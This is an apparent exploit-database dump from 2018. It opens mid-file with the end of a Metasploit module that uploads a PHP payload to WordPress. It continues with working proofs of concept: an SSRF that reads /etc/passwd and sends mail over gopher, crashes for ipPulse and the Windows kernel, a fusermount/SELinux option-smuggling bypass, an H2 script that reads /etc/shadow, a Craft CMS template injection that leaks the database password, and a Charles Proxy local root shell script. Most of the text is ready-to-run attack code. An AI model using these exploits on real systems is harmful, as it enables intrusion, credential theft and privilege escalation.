return CheckCode::Detected
end
nil
end
def login
auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
auth_cookies
end
def upload_payload(cookies)
manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
file_payload = get_write_exec_payload(:unlink_self => true)
file_name = "#{rand_text_alpha(5)}.php"
# attempt to access plugins page
plugin_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, manage_uri),
'cookie' => cookies
)
unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
end
data = Rex::MIME::Message.new
data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
post_data = data.to_s
# upload the file
upload_res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
'cookie' => cookies,
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
retrieve_file(page, cookies)
end
def retrieve_file(res, cookies)
fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
print_good("Successful upload")
send_request_cgi(
'uri' => file_uri,
'method' => 'GET',
'cookie' => cookies
)
end
def exploit
unless check == CheckCode::Safe
auth_cookies = login
upload_payload(auth_cookies)
end
end
end
# Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery
# Date: 2018-07-29
# Exploit Author: GUIA BRAHIM FOUAD
# Vendor Homepage: http://responsivefilemanager.com/
# Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsive_filemanager.zip
# Version: 9.13.1
# Tested on: responsive filemanager version: 9.13.1, php version: 7.0
# CVE : CVE-2018-14728
# PoC
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=file:///etc/passwd'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a'
curl 'http://localhost/filemanager/upload.php' --data 'fldr=&url=http://169.254.169.254/openstack'
# Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-07-27
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link : http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python ipPulse_1.92.py
# 2.- Open ipPulse_1.92.txt and copy content to clipboard
# 3.- Open ippulse.exe
# 4.- Target Editor
# 5.- Paste ClipBoard on "IP Address/HostName"
# 6.- Paste ClipBoard on "Comment"
# 7.- Add Above Fields to Target List >>
# 8.- OK
# 9.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 3400
f = open ("ipPulse_1.92.txt", "w")
f.write(buffer)
f.close()
/*
# Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
# Author: vportal
# Date: 2018-07-27
# Vendor homepage: http://www.microsoft.com
# Version: Windows 7 x86
# Tested on: Windows 7 x86
# CVE: N/A
# It is possible to trigger a BSOD caused by a Null pointer deference when calling the system
# call NtUserConsoleControl with the following arguments:
# NtUserControlConsole(1,0,8).
# NtUserControlConsole(4,0,8).
# NtUserControlConsole(6,0,12).
# NtUserControlConsole(2,0,12).
# NtUserControlConsole(3,0,20).
# NtUserControlConsole(5,0,8).
# Different crashes are reproduced for each case. For the second case the crash is showed below:
# EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - La instrucci n en 0x%08lx hace referencia a la memoria
# en 0x%08lx. La memoria no se pudo %s.
# FAULTING_IP:
# win32k!xxxSetConsoleCaretInfo+c
# 93310641 8b0e mov ecx,dword ptr [esi]
# TRAP_FRAME: 8c747b2c -- (.trap 0xffffffff8c747b2c)
# ErrCode = 00000000
# eax=00000000 ebx=00000000 ecx=84fc9100 edx=00000000 esi=00000000 edi=00000003
# eip=93310641 esp=8c747ba0 ebp=8c747bb0 iopl=0 nv up ei ng nz ac po nc
# cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010292
# win32k!xxxSetConsoleCaretInfo+0xc:
# 93310641 8b0e mov ecx,dword ptr [esi] ds:0023:00000000=????????
# Resetting default scope
# CUSTOMER_CRASH_COUNT: 1
# DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
# BUGCHECK_STR: 0x8E
# PROCESS_NAME: Win32k-fuzzer_
# CURRENT_IRQL: 0
# LAST_CONTROL_TRANSFER: from 9330fc27 to 93310641
# STACK_TEXT:
# 8c747bb0 9330fc27 00000000 00000003 00000014 win32k!xxxSetConsoleCaretInfo+0xc
# 8c747bcc 9330fa8d 00000003 00000000 00000014 win32k!xxxConsoleControl+0x147
# 8c747c20 82848b8e 00000003 00000000 00000014 win32k!NtUserConsoleControl+0xc5
# 8c747c20 012e6766 00000003 00000000 00000014 nt!KiSystemServicePostCall
# WARNING: Frame IP not in any known module. Following frames may be wrong.
# 0016f204 00000000 00000000 00000000 00000000 0x12e6766
# PoC code:
*/
#include <Windows.h>
extern "C"
ULONG CDECL SystemCall32(DWORD ApiNumber, ...)
{
__asm{mov eax, ApiNumber};
__asm{lea edx, ApiNumber + 4};
__asm{int 0x2e};
}
int _tmain(int argc, _TCHAR* argv[])
{
int st = 0;
int syscall_ID = 0x1160; //NtUserControlConsole ID Windows 7
LoadLibrary(L"user32.dll");
st = (int)SystemCall32(syscall_ID, 4, 0, 8);
return 0;
}
# The vulnerability has only been tested in Windows 7 x86.
/*
It is possible to bypass fusermount's restrictions on the use of the
"allow_other" mount option as follows if SELinux is active.
Here's a minimal demo, tested on a Debian system with SELinux enabled in
permissive mode:
===============================================
uuser@debian:~$ mount|grep /mount
user@debian:~$ grep user_allow_other /etc/fuse.conf
#user_allow_other
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o allow_other mount/
fusermount: option allow_other only allowed if 'user_allow_other' is set in /etc/fuse.conf
user@debian:~$ _FUSE_COMMFD=10000 fusermount -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-\,allow_other' mount
sending file descriptor: Bad file descriptor
user@debian:~$ mount|grep /mount
/dev/fuse on /home/user/mount type fuse (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
===============================================
Here's a demo that actually mounts a real FUSE filesystem with allow_other,
again on a Debian system configured to use SELinux:
===============================================
user@debian:~$ cat fuse-shim.c
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <dlfcn.h>
#include <stdlib.h>
int execv(const char *path, char *const argv_[]) {
char **argv = (void*)argv_; /* cast away const */
for (char **argvp = argv; *argvp != NULL; argvp++) {
char *arg = *argvp;
for (char *p = arg; *p; p++) {
if (*p == '#') *p = '\\';
}
}
int (*execv_real)(const char *, char *const argv[]) = dlsym(RTLD_NEXT, "execv");
execv_real(path, argv_);
}
/*
user@debian:~$ gcc -shared -o fuse-shim.so fuse-shim.c -ldl
user@debian:~$ echo hello world > hello.txt
user@debian:~$ zip hello.zip hello.txt
adding: hello.txt (stored 0%)
user@debian:~$ LD_PRELOAD=./fuse-shim.so fuse-zip -o 'context=system_u:object_r:fusefs_t:s0-s0:c0-#,allow_other' hello.zip mount
user@debian:~$ mount|grep /mount
fuse-zip on /home/user/mount type fuse.fuse-zip (rw,nosuid,nodev,relatime,context=system_u:object_r:fusefs_t:s0-s0:c0,user_id=1000,group_id=1000,allow_other)
user@debian:~$ sudo bash
root@debian:/home/user# ls -laZ mount
total 5
drwxrwxr-x. 3 root root system_u:object_r:fusefs_t:s0-s0:c0 0 Jul 18 02:19 .
drwxr-xr-x. 30 user user system_u:object_r:unlabeled_t:s0 4096 Jul 18 02:19 ..
-rw-r--r--. 1 user user system_u:object_r:fusefs_t:s0-s0:c0 12 Jul 18 02:19 hello.txt
root@debian:/home/user# cat mount/hello.txt
hello world
===============================================
I have tested that this also works on Fedora (which, unlike Debian, has SELinux
enabled by default.)
Unfortunately, I only noticed that this was possible after I publicly sent some
fusermount hardening patches (https://github.com/libfuse/libfuse/pull/268),
when the maintainer asked a question about one of the patches.
Breaking down the attack, the problems are:
1. fusermount's do_mount() is written as if backslashes escape commas in mount
options; however, this is only true for the "fsname" and "subtype"
pseudo-options filtered out by do_mount(). Neither SELinux nor the FUSE
filesystem follow those semantics. This means that an attacker can smuggle
a forbidden option through fusermount's checks if the previous option ends
with a backslash. However, no option accepted by the FUSE filesystem can end
with a backslash, so this seemed unexploitable at first.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/455e73588357
2. fusermount uses a blacklist, not a whitelist; this blacklist does not contain
the mount options understood by the SELinux and Smack LSMs. LSMs have the
opportunity to grab mount options and make them invisible to the actual
filesystem through the security_sb_copy_data() security hook.
For this attack, I'm using the "context" option.
This is fixed by the following commit in my pull request:
https://github.com/libfuse/libfuse/pull/268/commits/d23efabfcee4
3. The SELinux LSM is slightly lax about parsing the level component of SELinux
context strings when the policy uses Multi-Level Security (MLS).
When using MLS, the format of a context string is
"<user>:<role>:<type>:<level>"; the level component is parsed by
mls_context_to_sid(). The level component is supposed to specify a
sensitivity range (one or two parts delimited with '-'); each part of the
range may be followed by ':' and a category set specification.
If the sensitivity range consists of two parts and the second part of the
range is followed by a category set, the function incorrectly marks a
trailing '-' and any following data until ':' or '\0' as consumed, but does
not actually parse this data. This allows an attacker to smuggle a backslash
through.
*/
# Exploit Title: H2 Database 1.4.197 - Information Disclosure
# Date: 2018-07-16
# Exploit Author: owodelta
# Vendor Homepage: www.h2database.com
# Software Link: http://www.h2database.com/html/download.html
# Version: all versions
# Tested on: Linux
# CVE : CVE-2018-14335
# Description: Insecure handling of permissions in the backup function allows
# attackers to read sensitive files (outside of their permissions) via a
# symlink to a fake database file.
# PS, thanks to HTB and our team FallenAngels
#!/usr/bin/python
import requests
import argparse
import os
import random
def cleanup(wdir):
cmd = "rm {}symlink.trace.db".format(wdir)
os.system(cmd)
def create_symlink(file, wdir):
cmd = "ln -s {0} {1}symlink.trace.db".format(file,wdir)
os.system(cmd)
def trigger_symlink(host, wdir):
outputName = str(random.randint(1000,10000))+".zip"
#get cookie
url = 'http://{}'.format(host)
r = requests.get(url)
path = r.text.split('href = ')[1].split(';')[0].replace("'","").replace('login.jsp','tools.do')
url = '{}/{}'.format(url,path)
payload = {
"tool":"Backup",
"args":"-file,"+wdir+outputName+",-dir,"+wdir}
#print url
requests.post(url,data=payload).text
print "File is zipped in: "+wdir+outputName
if __name__ == "__main__":
parser = argparse.ArgumentParser()
required = parser.add_argument_group('required arguments')
required.add_argument("-H",
"--host",
metavar='127.0.0.1:8082',
help="Target host",
required=True)
required.add_argument("-D",
"--dir",
metavar="/tmp/",
default="/tmp/",
help="Writable directory")
required.add_argument("-F",
"--file",
metavar="/etc/shadow",
default="/etc/shadow",
help="Desired file to read",)
args = parser.parse_args()
create_symlink(args.file,args.dir)
trigger_symlink(args.host,args.dir)
cleanup(args.dir)
# Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
# Date: 2018-07-20
# Software Link: https://github.com/nystudio107/craft-seomatic
# Exploit Author: Sebastian Kriesten (0xB455)
# Contact: https://twitter.com/0xB455
# CVE: CVE-2018-14716
# Category: webapps
# 1. Description
# An unauthenticated user can trigger the Twig template engine by injecting
# code into the URI as described in this article:
# http://ha.cker.info/exploitation-of-server-side-template-injection-with-craft-cms-plguin-seomatic/
# This can be leveraged to perform arbitrary calls against the template engine and the CMS.
# The output will be reflected within the Link header of the response.
# 2. Proof of Concept
# The injection can be performed against any part of the URL path. However as the framework is replacing
# control characters with HTML entities (e.g. ' ==> ') it is not possible to directly address methods with
# parameter values. Therefor it is required to bypass the filter by invoking functions such as craft.request.getUserAgent()
# and store the parameter values in the User-Agent header. In combination with Twig's slice() filter it is then possible
# to extract sensitive information by utilizing the craft.config.get() method:
# Request:
HEAD /db-password:%20%7b%25%20set%20dummy%20=%20craft.request.getUserAgent()|slice(0,8)%25%7d%7b%25%20set%20dummy2%20=%20craft.request.getUserAgent()|slice(9,2)%25%7d%7b%7bcraft.config.get(dummy,dummy2)%7d%7d HTTP/1.1
Host: craft-installation
User-Agent: password db
# Response:
HTTP/1.1 404 Not Found
Server: nginx
…
Link: <db-password: SECRET>; rel='canonical'
…
Charles Proxy is a great mac application for debugging web services and
inspecting SSL traffic for any application on your machine.
In order to inspect the SSL traffic it needs to configure the system to use a
proxy so that it can capture the packets and use its custom root CA to decode
the SSL.
Setting a system-wide proxy requires root permissions so this is handled by an
suid binary located within the Charles application folder:
/Applications/Charles.app/Contents/Resources/Charles Proxy Settings
Unfortunately this binary is vulnerable to a race condition which allows a local
user to spawn a root shell. It supports a parameter "--self-repair" which it
uses to re-set the root+suid permissions on itself, with a graphical dialog
shown to the user. However if this is called when the binary is already
root+suid then no password dialog is shown.
It doesn't validate the path to itself and uses a simple API call to get the
path to the binary at the time it was invoked. This means that between executing
the binary and reaching the code path where root+suid is set there is enough
time to replace the path to the binary with an alternate payload which will then
receive the suid+root permissions instead of the Charles binary.
This issue was fixed in Charles 4.2.1 released in November 2017.
https://m4.rkw.io/charles_4.2.sh.txt
2f4a2dca6563d05a201108ec6e9454e2894b603b68b3b70b8f8b043b43ee9284
-------------------------------------------------------------------------------
#!/bin/bash
####################################################
###### Charles 4.2 local root privesc exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html ######
####################################################
cd
user="`whoami`"
cat > charles_exploit.c <<EOF
#include <unistd.h>
int main()
{
setuid(0);
seteuid(0);
execl("/bin/bash","bash","-c","rm -f \"/Users/$user/Charles Proxy Settings\"; /bin/bash",NULL);
return 0;
}
EOF
gcc -o charles_exploit charles_exploit.c
if [ $? -ne 0 ] ; then
echo "failed to compile the exploit, you need xcode cli tools for this."
exit 1
fi
rm -f charles_exploit.c
ln -s /Applications/Charles.app/Contents/Resources/Charles\ Proxy\ Settings
./Charles\ Proxy\ Settings --self-repair 2>/dev/null &
rm -f ./Charles\ Proxy\ Settings
mv charles_exploit Charles\ Proxy\ Settings
i=0
while :
do
r=`ls -la Charles\ Proxy\ Settings |grep root`
if [ "$r" != "" ] ; then
break
fi
sleep 0.1
i=$((i+1))
if [ $i -eq 10 ] ; then
rm -f Charles\ Proxy\ Settings
echo "Not vulnerable"
exit 1
fi
done
./Charles\ Proxy\ Settings